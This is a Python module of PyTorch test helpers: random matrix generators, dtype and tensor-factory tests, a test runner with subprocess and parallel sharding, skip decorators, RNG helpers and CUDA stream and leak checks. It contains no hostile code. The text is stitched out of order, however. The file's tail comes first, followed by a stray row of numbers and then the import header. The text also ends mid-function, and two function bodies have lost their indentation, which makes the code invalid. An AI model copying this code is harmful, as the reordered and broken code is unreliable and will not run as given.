def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
    """Return rectangular matrix or batches of rectangular matrices with
    given rank.
    """
    # The product of a (rows x rank) and a (rank x columns) factor has rank
    # at most `rank` (and exactly `rank` for generic random factors).
    left = random_matrix(rows, rank, *batch_dims, **kwargs)
    right = random_matrix(rank, columns, *batch_dims, **kwargs)
    return left.matmul(right)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
    """Return rectangular random sparse matrix within given density.

    The density of the result approaches to given density as the size
    of the matrix is increased and a relatively small value of density
    is specified but higher than min(rows, columns)/(rows * columns)
    for non-singular matrices.
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    # NOTE: the previous version also read an unused `singular` kwarg and
    # computed an unused `k = min(rows, columns)`; both removed.
    nonzero_elements = max(min(rows, columns), int(rows * columns * density))

    row_indices = [i % rows for i in range(nonzero_elements)]
    column_indices = [i % columns for i in range(nonzero_elements)]
    random.shuffle(column_indices)
    indices = [row_indices, column_indices]
    values = torch.randn(nonzero_elements, dtype=dtype, device=device)
    # ensure that the diagonal dominates
    values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
    A = torch.sparse_coo_tensor(indices, values, (rows, columns), device=device)
    return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
    """Return random sparse positive-definite matrix with given density.

    The eigenvalues of the matrix are defined as::
        arange(1, matrix_size+1)/matrix_size

    Algorithm:
      A = diag(arange(1, matrix_size+1)/matrix_size)
      while <A density is smaller than required>:
        <choose random i, j in range(matrix_size), theta in [0, 2*pi]>
        R = <rotation matrix (i,j,theta)>
        A = R^T A R
    """
    import math
    # Allows callers to substitute an alternative torch-like module via the
    # 'torch' kwarg (defaults to the real torch from this module's globals).
    torch = kwargs.get('torch', globals()['torch'])
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    # The matrix is built as a {(i, j): value} dict of nonzero entries and
    # only converted to a sparse COO tensor at the end.
    data = dict([((i, i), float(i + 1) / matrix_size)
                 for i in range(matrix_size)])


    def multiply(data, N, i, j, cs, sn, left=True):
        # Applies the (i, j, theta) rotation (cs=cos(theta), sn=sin(theta))
        # to `data` in place, from the left or from the right.
        for k in range(N):
            if left:
                ik, jk = (k, i), (k, j)
            else:
                ik, jk = (i, k), (j, k)
            aik, ajk = data.get(ik, 0), data.get(jk, 0)
            aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
            # Store only nonzero results to keep the representation sparse.
            if aik:
                data[ik] = aik
            else:
                data.pop(ik, None)
            if ajk:
                data[jk] = ajk
            else:
                data.pop(jk, None)

    target_nnz = density * matrix_size * matrix_size
    while len(data) < target_nnz:
        i = random.randint(0, matrix_size - 1)
        j = random.randint(0, matrix_size - 1)
        if i != j:
            theta = random.uniform(0, 2 * math.pi)
            cs = math.cos(theta)
            sn = math.sin(theta)
            # R^T A R is a similarity transform, so eigenvalues (and thus
            # positive-definiteness) are preserved while fill-in grows.
            multiply(data, matrix_size, i, j, cs, sn, left=True)
            multiply(data, matrix_size, i, j, cs, sn, left=False)
    icoords, jcoords, values = [], [], []
    for (i, j), v in sorted(data.items()):
        icoords.append(i)
        jcoords.append(j)
        values.append(v)
    indices = [icoords, jcoords]
    return torch.sparse_coo_tensor(indices, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
    # Verifies torch.zeros honors the requested dtype/layout/device for each
    # dtype in `dtypes` (float16 is skipped).
    for dtype in dtypes:
        if dtype == torch.float16:
            continue
        out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
        self.assertIs(dtype, out.dtype)
        self.assertIs(layout, out.layout)
        self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
    """Exercises torch.empty/torch.full and their new_*/_like variants across
    `dtypes`, checking shape, dtype, layout, requires_grad and fill value."""
    shape = torch.Size([2, 3])

    def check_value(tensor, dtype, layout, device, value, requires_grad):
        # Validates one produced tensor; `value` is the expected fill value
        # (None skips the content check).
        self.assertEqual(shape, tensor.shape)
        self.assertIs(dtype, tensor.dtype)
        self.assertIs(layout, tensor.layout)
        self.assertEqual(tensor.requires_grad, requires_grad)
        if tensor.is_cuda and device is not None:
            self.assertEqual(device, tensor.device)
        if value is not None:
            fill = tensor.new(shape).fill_(value)
            self.assertEqual(tensor, fill)

    def get_int64_dtype(dtype):
        # Maps a dtype to the int64 dtype in the same namespace
        # (e.g. "torch.cuda" dtypes map to torch.cuda's int64).
        module = '.'.join(str(dtype).split('.')[1:-1])
        if not module:
            return torch.int64
        return operator.attrgetter(module)(torch).int64

    default_dtype = torch.get_default_dtype()
    # NOTE(review): the -1 below occupies check_value's `device` slot; it is
    # never compared because these tensors are on CPU (is_cuda is False).
    check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
    check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
    for dtype in dtypes:
        # rg iterates over the requires_grad values valid for the dtype
        # (True only for floating-point dtypes).
        for rg in {dtype.is_floating_point, False}:
            int64_dtype = get_int64_dtype(dtype)
            v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
            check_value(v, dtype, layout, device, None, rg)
            out = v.new()
            check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
                        dtype, layout, device, None, rg)
            check_value(v.new_empty(shape), dtype, layout, device, None, False)
            check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
                        int64_dtype, layout, device, None, False)
            check_value(torch.empty_like(v), dtype, layout, device, None, False)
            check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
                        int64_dtype, layout, device, None, False)

            # torch.full is only checked where it is supported
            # (not float16, not sparse).
            if dtype is not torch.float16 and layout != torch.sparse_coo:
                fv = 3
                v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
                check_value(v, dtype, layout, device, fv, rg)
                check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
                out = v.new()
                check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
                            dtype, layout, device, fv + 2, rg)
                check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
                            int64_dtype, layout, device, fv + 3, False)
                check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
                check_value(torch.full_like(v, fv + 5,
                                            dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
                            int64_dtype, layout, device, fv + 5, False)
# Names of tests known to be extremely slow; test runners consult this set to
# skip or special-case them.
THESE_TAKE_WAY_TOO_LONG = {
    'test_Conv3d_groups',
    'test_conv_double_backward',
    'test_conv_double_backward_groups',
    'test_Conv3d_dilated',
    'test_Conv3d_stride_padding',
    'test_Conv3d_dilated_strided',
    'test_Conv3d',
    'test_Conv2d_dilated',
    'test_ConvTranspose3d_dilated',
    'test_ConvTranspose2d_dilated',
    'test_snli',
    'test_Conv2d',
    'test_Conv2d_padding',
    'test_ConvTranspose2d_no_bias',
    'test_ConvTranspose2d',
    'test_ConvTranspose3d',
    'test_Conv2d_no_bias',
    'test_matmul_4d_4d',
    'test_multinomial_invalid_probs',
}
# Absolute path of the test script being executed (None when undetermined).
running_script_path = None


def set_running_script_path():
    """Best-effort recording of the running script's absolute path into the
    module-level `running_script_path`; leaves it unset on any failure."""
    global running_script_path
    try:
        candidate = os.path.abspath(os.path.realpath(sys.argv[0]))
        if candidate.endswith('.py'):  # skip if the running file is not a script
            running_script_path = candidate
    except Exception:
        pass
def check_test_defined_in_running_script(test_case):
    """Asserts that `test_case`'s class lives in the script being run, which
    catches accidental cross-file TestCase imports."""
    # Nothing to validate when the running script could not be determined.
    if running_script_path is None:
        return
    test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
    assert test_case_class_file == running_script_path, (
        "Class of loaded TestCase \"{}\" is not defined in the running script "
        "\"{}\", but in \"{}\". Did you accidentally import a unittest.TestCase "
        "from another file?".format(test_case.id(), running_script_path, test_case_class_file))
def load_tests(loader, tests, pattern):
    # unittest load_tests protocol hook: flattens the discovered groups into
    # one suite, validating each test is defined in the running script.
    set_running_script_path()
    suite = unittest.TestSuite()
    for group in tests:
        for test in group:
            check_test_defined_in_running_script(test)
            suite.addTest(test)
    return suite
class BytesIOContext(io.BytesIO):
    """A BytesIO usable in a `with` statement.

    Exiting the block deliberately does NOT close the buffer, so its
    contents stay readable afterwards.
    """

    def __enter__(self):
        return self

    def __exit__(self, *args):
        pass  # intentionally keep the buffer open
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs):
    # call assert function rather than returning a bool since it's nicer
    # if we get whether this failed on the gradcheck or the gradgradcheck.
    for check in (gradcheck, gradgradcheck):
        test_case.assertTrue(check(apply_fn, inputs))
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
# Legacy dtype -> absolute-tolerance map still consulted by older NN tests.
dtype2prec_DONTUSE = {torch.float: 1e-5,
                      torch.double: 1e-5,
                      torch.half: 1e-2,
                      torch.bfloat16: 1e-1}
| 40.056911 | 124 | 0.625243 |
import sys
import os
import platform
import re
import gc
import types
from functools import partial
import inspect
import io
import argparse
import unittest
import warnings
import random
import contextlib
import socket
import subprocess
import time
from collections import OrderedDict
from contextlib import contextmanager
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
from urllib.request import urlopen
import __main__
import errno
from typing import cast, Any, Iterable, Optional
from torch.testing._internal import expecttest
from torch.testing import _compare_tensors_internal, _compare_scalars_internal, _compare_return_type
import torch
import torch.cuda
from torch._utils_internal import get_writable_path
from torch._six import string_classes
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
torch.backends.disable_global_flags()
# True when running under Facebook's Sandcastle CI (detected via env vars).
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
class ProfilingMode(Enum):
    """JIT graph-executor configurations the test suite can run under."""
    LEGACY = 1
    SIMPLE = 2
    PROFILING = 3
def cppProfilingFlagsToProfilingMode():
    """Reads the current C++ JIT profiling flags and maps them onto a
    ProfilingMode value.

    The setters return the previous flag value, so each flag is read by
    setting it and immediately restoring the old value.
    """
    old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
    old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
    torch._C._jit_set_profiling_executor(old_prof_exec_state)
    torch._C._jit_set_profiling_mode(old_prof_mode_state)

    if old_prof_exec_state:
        if old_prof_mode_state:
            return ProfilingMode.PROFILING
        else:
            return ProfilingMode.SIMPLE
    else:
        return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
    # Temporarily turns on the profiling executor and profiling mode, but
    # only when the suite is running under ProfilingMode.PROFILING; previous
    # flag values are restored on exit.
    if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
        old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
        old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
    try:
        yield
    finally:
        if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
            torch._C._jit_set_profiling_executor(old_prof_exec_state)
            torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
    # Unconditionally enables the profiling executor and profiling mode for
    # the duration of the with-block, restoring the previous flags on exit.
    old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
    old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
    try:
        yield
    finally:
        torch._C._jit_set_profiling_executor(old_prof_exec_state)
        torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
    # Temporarily overrides how many profiled runs the JIT performs before
    # specializing; the previous setting is restored on exit.
    old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
    try:
        yield
    finally:
        torch._C._jit_set_num_profiled_runs(old_num_runs)
# Monkey-patch ScriptFunction/ScriptMethod __call__ so scripted callables
# honor the test-only 'profile_and_replay' kwarg: under the profiling
# executor the callable is invoked once extra to warm up the profiler.
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__

def prof_callable(callable, *args, **kwargs):
    # Strip the test-only kwarg before forwarding to the real __call__.
    if 'profile_and_replay' in kwargs:
        del kwargs['profile_and_replay']
        if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
            with enable_profiling_mode_for_profiling_tests():
                callable(*args, **kwargs)  # profiling warm-up run
                return callable(*args, **kwargs)

    return callable(*args, **kwargs)

def prof_func_call(*args, **kwargs):
    return prof_callable(func_call, *args, **kwargs)

def prof_meth_call(*args, **kwargs):
    return prof_callable(meth_call, *args, **kwargs)

torch._C.ScriptFunction.__call__ = prof_func_call
torch._C.ScriptMethod.__call__ = prof_meth_call
def _get_test_report_path():
    # CI can override the report subdirectory name via environment variable.
    override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
    source = 'python-unittest' if override is None else override
    return os.path.join('test-reports', source)
# Test-runner command-line flags; parse_known_args lets unittest's own flags
# pass through untouched (collected in `remaining`).
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--subprocess', action='store_true',
                    help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--ge_config', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
                    const=_get_test_report_path(),
                    default=_get_test_report_path() if bool(os.environ.get('IN_CIRCLECI')) else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)

args, remaining = parser.parse_known_args()
# Map --ge_config onto a ProfilingMode; with no flag, defer to the C++
# profiling flags currently in effect.
if args.ge_config == 'legacy':
    GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.ge_config == 'profiling':
    GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.ge_config == 'simple':
    GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
    GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()

LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
# --accept can only turn accept-mode ON; it never clears an already-set flag.
if not expecttest.ACCEPT:
    expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
def wait_for_process(p):
    """Waits on Popen `p` and returns its exit code.

    On KeyboardInterrupt the child gets 5 seconds to exit gracefully before
    being killed; the interrupt is then re-raised. Any other exception kills
    the child and propagates.
    """
    try:
        return p.wait()
    except KeyboardInterrupt:
        # BUGFIX: Popen.wait(timeout=...) raises subprocess.TimeoutExpired
        # instead of returning None, so the old `if exit_status is not None`
        # check could never fire and a hung child was never killed (leaving
        # the `finally` wait to block forever).
        try:
            return p.wait(timeout=5)
        except subprocess.TimeoutExpired:
            p.kill()
        raise
    except:  # noqa E722, copied from python core library
        p.kill()
        raise
    finally:
        # Always call p.wait() to ensure the child is reaped.
        p.wait()
def shell(command, cwd=None, env=None):
    """Run `command` (a list/tuple of tokens) in a subprocess, returning its
    exit code.

    stdout/stderr are flushed first so the child's output interleaves
    correctly with ours.  SIGINT/cleanup handling lives in wait_for_process,
    which mirrors Py3's subprocess.call with a KeyboardInterrupt branch added
    and an unconditional wait so the child is always reaped.
    """
    sys.stdout.flush()
    sys.stderr.flush()
    # Fixed: this assert line was corrupted in the source ("t not isinstance")
    # -- restore the guard that rejects bare command strings.
    assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
    p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
    return wait_for_process(p)
def repeat_test_for_types(dtypes):
    """Decorator factory: run the wrapped test once per dtype in `dtypes`,
    each run inside its own subTest so failures report the dtype."""
    def repeat_helper(f):
        @wraps(f)
        def call_helper(self, *args):
            for dt in dtypes:
                with TestCase.subTest(self, dtype=dt):
                    f(self, *args, dtype=dt)
        return call_helper
    return repeat_helper
# True when running inside PyTorch's CI (the CI environment sets this var).
IS_PYTORCH_CI = bool(os.environ.get('IS_PYTORCH_CI'))
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
    """Return 'ClassName.method_name' identifiers for the given test cases."""
    names = []
    for case in test_cases:
        names.append('.'.join(case.id().split('.')[-2:]))
    return names
def chunk_list(lst, nchunks):
    """Partition `lst` round-robin into `nchunks` stride-sliced sublists:
    chunk k receives elements k, k+nchunks, k+2*nchunks, ..."""
    return [lst[offset::nchunks] for offset in range(nchunks)]
def run_tests(argv=UNITTEST_ARGS):
    """Entry point used by every test script; dispatches on the module-level
    flags parsed at import time (discover / subprocess / parallel / xml /
    repeat), falling back to a plain unittest.main run."""
    if TEST_DISCOVER:
        # --discover-tests: only print the test names, run nothing.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        for name in get_test_names(test_cases):
            print(name)
    elif TEST_IN_SUBPROCESS:
        # --subprocess: re-invoke this script once per test case, collecting
        # the names of all cases whose child process exited non-zero.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        failed_tests = []
        for case in test_cases:
            test_case_full_name = case.id().split('.', 1)[1]
            exitcode = shell([sys.executable] + argv + [test_case_full_name])
            if exitcode != 0:
                failed_tests.append(test_case_full_name)
        assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
            len(failed_tests), '\n\t'.join(failed_tests))
    elif RUN_PARALLEL > 1:
        # --run-parallel N: shard test names round-robin over N child
        # processes, each writing logs with its own -shard-<i> suffix.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
        processes = []
        for i in range(RUN_PARALLEL):
            command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
            processes.append(subprocess.Popen(command, universal_newlines=True))
        failed = False
        for p in processes:
            failed |= wait_for_process(p) != 0
        assert not failed, "Some test shards have failed"
    elif TEST_SAVE_XML is not None:
        # --save-xml: emit JUnit-style XML reports via xmlrunner.
        # Imported here so non-CI runs don't need xmlrunner installed.
        import xmlrunner
        test_report_path = TEST_SAVE_XML + LOG_SUFFIX
        os.makedirs(test_report_path, exist_ok=True)
        verbose = '--verbose' in argv or '-v' in argv
        if verbose:
            print('Test results will be stored in {}'.format(test_report_path))
        unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
    elif REPEAT_COUNT > 1:
        # --repeat N: rerun the whole suite, exiting on the first failing run.
        for _ in range(REPEAT_COUNT):
            if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
                sys.exit(-1)
    else:
        unittest.main(argv=argv)
# Host-platform detection flags used throughout the test suite.
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
if IS_WINDOWS:
    @contextmanager
    def TemporaryFileName():
        """Yield the name of a closed temporary file; the file is removed on
        exit."""
        # Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
        # opens the file, and it cannot be opened multiple times in Windows. To support Windows,
        # close the file after creation and try to remove it manually
        f = tempfile.NamedTemporaryFile(delete=False)
        try:
            f.close()
            yield f.name
        finally:
            os.unlink(f.name)
else:
    @contextmanager  # noqa: T484
    def TemporaryFileName():
        """Yield the name of an open NamedTemporaryFile (POSIX allows the same
        file to be opened again by name)."""
        with tempfile.NamedTemporaryFile() as f:
            yield f.name
def _check_module_exists(name):
import importlib
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
# Optional-dependency availability flags (probed without importing).
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
# Sanitizer / ROCm / slow-test toggles driven by the CI environment.
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
if TEST_NUMPY:
    import numpy as np
    # Bidirectional numpy<->torch dtype maps used by the comparison helpers.
    # NOTE(review): np.bool and friends are builtin aliases that were removed
    # in numpy >= 1.24 -- this table presumes an older numpy; confirm pinning.
    numpy_to_torch_dtype_dict = {
        np.bool : torch.bool,
        np.uint8 : torch.uint8,
        np.int8 : torch.int8,
        np.int16 : torch.int16,
        np.int32 : torch.int32,
        np.int64 : torch.int64,
        np.float16 : torch.float16,
        np.float32 : torch.float32,
        np.float64 : torch.float64,
        np.complex64 : torch.complex64,
        np.complex128 : torch.complex128
    }
    torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
# Floating-point dtypes exercised by generated tests; the "2" variant also
# covers bfloat16 on ROCm builds.
ALL_TENSORTYPES = [torch.float,
                   torch.double,
                   torch.half]
if TEST_WITH_ROCM:
    ALL_TENSORTYPES2 = [torch.float,
                        torch.double,
                        torch.half,
                        torch.bfloat16]
else:
    ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
    """Skip the decorated test when running on the ROCm stack."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if not TEST_WITH_ROCM:
            fn(*args, **kwargs)
        else:
            raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
    return wrapper
def skipIfCompiledWithoutNumpy(fn):
    """Skip the decorated test when PyTorch itself was built without numpy.

    The numpy module can be importable even though the PyTorch build used
    USE_NUMPY=0, so probe torch.from_numpy directly at decoration time.
    """
    numpy_support = TEST_NUMPY
    if numpy_support:
        try:
            torch.from_numpy(np.array([2, 2]))
        except RuntimeError:
            numpy_support = False
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if numpy_support:
            fn(*args, **kwargs)
        else:
            raise unittest.SkipTest("PyTorch was compiled without numpy support")
    return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
    """Skip the decorated test when PyTorch was built without LAPACK."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if torch._C.has_lapack:
            fn(*args, **kwargs)
        else:
            raise unittest.SkipTest('PyTorch compiled without Lapack')
    return wrapper
def skipIfNotRegistered(op_name, message):
    """Return a skip decorator: skip with `message` unless the Caffe2 operator
    `op_name` is registered; skip unconditionally when caffe2 is absent."""
    try:
        from caffe2.python import core
    except ImportError:
        return unittest.skip("Cannot import `caffe2.python.core`")
    return unittest.skipIf(op_name not in core._REGISTERED_OPERATORS, message)
def skipIfNoSciPy(fn):
    """Skip the decorated test when SciPy is not installed."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if TEST_SCIPY:
            fn(*args, **kwargs)
        else:
            raise unittest.SkipTest("test require SciPy, but SciPy not found")
    return wrapper
def slowTest(fn):
    """Mark a test as slow: it only runs when PYTORCH_TEST_WITH_SLOW=1, and
    the 'slow_test' attribute lets PYTORCH_TEST_SKIP_FAST keep it."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if TEST_WITH_SLOW:
            fn(*args, **kwargs)
        else:
            raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
    wrapper.__dict__['slow_test'] = True
    return wrapper
def skipCUDAMemoryLeakCheckIf(condition):
    """Disable the per-test CUDA memory-leak check when `condition` is true."""
    def dec(fn):
        # Only flip the flag when it is currently (or defaults to) True.
        if getattr(fn, '_do_cuda_memory_leak_check', True):
            fn._do_cuda_memory_leak_check = not condition
        return fn
    return dec
def skipCUDANonDefaultStreamIf(condition):
    """Disable non-default-stream enforcement for a test when `condition` is
    true."""
    def dec(fn):
        # Only flip the flag when it is currently (or defaults to) True.
        if getattr(fn, '_do_cuda_non_default_stream', True):
            fn._do_cuda_non_default_stream = not condition
        return fn
    return dec
def suppress_warnings(fn):
    """Run the wrapped function with all Python warnings silenced."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            fn(*args, **kwargs)
    return wrapper
def get_cpu_type(type_name):
    """Map a 'torch.cuda.X' tensor-type name to its CPU counterpart."""
    namespace, cls_name = type_name.rsplit('.', 1)
    assert namespace == 'torch.cuda'
    return getattr(torch, cls_name)
def get_gpu_type(type_name):
    """Map a 'torch.X' tensor type (class or name string) to its torch.cuda
    counterpart."""
    if isinstance(type_name, type):
        type_name = '{}.{}'.format(type_name.__module__, type_name.__name__)
    namespace, cls_name = type_name.rsplit('.', 1)
    assert namespace == 'torch'
    return getattr(torch.cuda, cls_name)
def to_gpu(obj, type_map=None):
    """Deep-copy `obj` onto the GPU.

    Leaf tensors are cloned to the CUDA type given by `type_map` (keyed on
    the source type string) or to the default CUDA twin of their type;
    storages are copied; lists/tuples convert element-wise; anything else is
    deep-copied unchanged.
    """
    if type_map is None:
        type_map = {}
    if isinstance(obj, torch.Tensor):
        assert obj.is_leaf
        target_type = type_map.get(obj.type(), get_gpu_type(obj.type()))
        with torch.no_grad():
            copy = obj.clone().type(target_type)
        copy.requires_grad = obj.requires_grad
        return copy
    if torch.is_storage(obj):
        return obj.new().resize_(obj.size()).copy_(obj)
    if isinstance(obj, list):
        return [to_gpu(item, type_map) for item in obj]
    if isinstance(obj, tuple):
        return tuple(to_gpu(item, type_map) for item in obj)
    return deepcopy(obj)
def get_function_arglist(func):
    """Return the names of `func`'s positional parameters (excludes *args,
    keyword-only args, and **kwargs)."""
    spec = inspect.getfullargspec(func)
    return spec.args
def set_rng_seed(seed):
    """Seed every RNG used by the tests: Python's, torch's, and numpy's when
    numpy is available."""
    random.seed(seed)
    torch.manual_seed(seed)
    if TEST_NUMPY:
        np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
    """Context manager: restore the CPU (and CUDA, when available) RNG state
    on exit so random draws inside the block don't perturb later code.

    Fix: restoration now happens in a ``finally`` block, so the state is
    restored even when the body raises (the original skipped restoration on
    exceptions).
    """
    rng_state = torch.get_rng_state()
    cuda_rng_state = torch.cuda.get_rng_state() if torch.cuda.is_available() else None
    try:
        yield
    finally:
        if cuda_rng_state is not None:
            torch.cuda.set_rng_state(cuda_rng_state)
        torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
    """Context manager: temporarily set torch's default dtype.

    Fix: the previous dtype is now restored in a ``finally`` block, so it is
    reinstated even when the body raises (the original left the override in
    place on exceptions).
    """
    saved_dtype = torch.get_default_dtype()
    torch.set_default_dtype(dtype)
    try:
        yield
    finally:
        torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
    """Iterate over every index of `tensor`: plain ints for 1-D, tuples for
    higher ranks, and an empty range for 0-D."""
    dim = tensor.dim()
    if dim == 0:
        return range(0)
    if dim == 1:
        return range(tensor.size(0))
    return product(*(range(extent) for extent in tensor.size()))
def is_iterable(obj):
    """True iff `obj` supports iteration (EAFP check via iter())."""
    try:
        iter(obj)
    except TypeError:
        return False
    return True
class CudaNonDefaultStream():
    """Context manager: while active, every CUDA device runs on a freshly
    created stream instead of its default stream, exposing tests that
    implicitly depend on the default stream."""
    def __enter__(self):
        # Before starting CUDA test save currently active streams on all
        # CUDA devices and set new non default streams to all CUDA devices
        # to ensure CUDA tests do not use default stream by mistake.
        beforeDevice = torch.cuda.current_device()
        self.beforeStreams = []
        for d in range(torch.cuda.device_count()):
            self.beforeStreams.append(torch.cuda.current_stream(d))
            deviceStream = torch.cuda.Stream(device=d)
            torch._C._cuda_setStream(deviceStream._cdata)
        # Re-select the device that was current before the loop.
        torch._C._cuda_setDevice(beforeDevice)
    def __exit__(self, exec_type, exec_value, traceback):
        # After completing CUDA test load previously active streams on all
        # CUDA devices.
        beforeDevice = torch.cuda.current_device()
        for d in range(torch.cuda.device_count()):
            torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
        torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
    """Context manager that asserts torch.cuda.memory_allocated is unchanged
    across the block on every device; used by TestCase's leak checking."""
    def __init__(self, testcase, name=None):
        self.name = testcase.id() if name is None else name
        self.testcase = testcase
        # initialize context & RNG to prevent false positive detections
        # when the test is the first to initialize those
        from torch.testing._internal.common_cuda import initialize_cuda_context_rng
        initialize_cuda_context_rng()
    @staticmethod
    def get_cuda_memory_usage():
        # we don't need CUDA synchronize because the statistics are not tracked at
        num_devices = torch.cuda.device_count()
